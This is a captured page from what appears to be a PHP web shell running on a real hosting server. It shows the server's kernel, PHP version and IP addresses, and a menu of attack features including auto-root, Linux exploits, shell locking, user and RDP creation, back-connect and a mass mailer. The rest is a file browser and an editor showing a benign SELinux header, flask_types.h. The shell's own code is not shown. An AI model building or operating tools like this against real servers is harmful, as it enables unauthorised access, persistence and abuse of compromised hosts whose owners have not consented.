Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.68.186.83
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
include /
sepol /
policydb /
[ HOME SHELL ]
Name
Size
Permission
Action
avrule_block.h
1.6
KB
-rw-r--r--
avtab.h
4.63
KB
-rw-r--r--
conditional.h
4.63
KB
-rw-r--r--
constraint.h
2.51
KB
-rw-r--r--
context.h
3.42
KB
-rw-r--r--
ebitmap.h
3.4
KB
-rw-r--r--
expand.h
3.57
KB
-rw-r--r--
flask_types.h
1.49
KB
-rw-r--r--
hashtab.h
3.32
KB
-rw-r--r--
hierarchy.h
1.78
KB
-rw-r--r--
link.h
517
B
-rw-r--r--
mls_types.h
4.98
KB
-rw-r--r--
module.h
1.5
KB
-rw-r--r--
polcaps.h
767
B
-rw-r--r--
policydb.h
26.03
KB
-rw-r--r--
services.h
8.15
KB
-rw-r--r--
sidtab.h
1.93
KB
-rw-r--r--
symtab.h
1.08
KB
-rw-r--r--
util.h
1.43
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : flask_types.h
/* -*- linux-c -*- */ /* * Author : Stephen Smalley, <sds@tycho.nsa.gov> */ #ifndef _SEPOL_POLICYDB_FLASK_TYPES_H_ #define _SEPOL_POLICYDB_FLASK_TYPES_H_ /* * The basic Flask types and constants. */ #include <sys/types.h> #include <stdint.h> #ifdef __cplusplus extern "C" { #endif /* * A security context is a set of security attributes * associated with each subject and object controlled * by the security policy. The security context type * is defined as a variable-length string that can be * interpreted by any application or user with an * understanding of the security policy. */ typedef char *sepol_security_context_t; /* * An access vector (AV) is a collection of related permissions * for a pair of SIDs. The bits within an access vector * are interpreted differently depending on the class of * the object. The access vector interpretations are specified * in policy. */ typedef uint32_t sepol_access_vector_t; /* * Each object class is identified by a fixed-size value. * The set of security classes is specified in policy. */ typedef uint16_t sepol_security_class_t; #define SEPOL_SECCLASS_NULL 0x0000 /* no class */ #define SELINUX_MAGIC 0xf97cff8c #define SELINUX_MOD_MAGIC 0xf97cff8d typedef uint32_t sepol_security_id_t; #define SEPOL_SECSID_NULL 0 struct sepol_av_decision { sepol_access_vector_t allowed; sepol_access_vector_t decided; sepol_access_vector_t auditallow; sepol_access_vector_t auditdeny; uint32_t seqno; }; #ifdef __cplusplus } #endif #endif
Close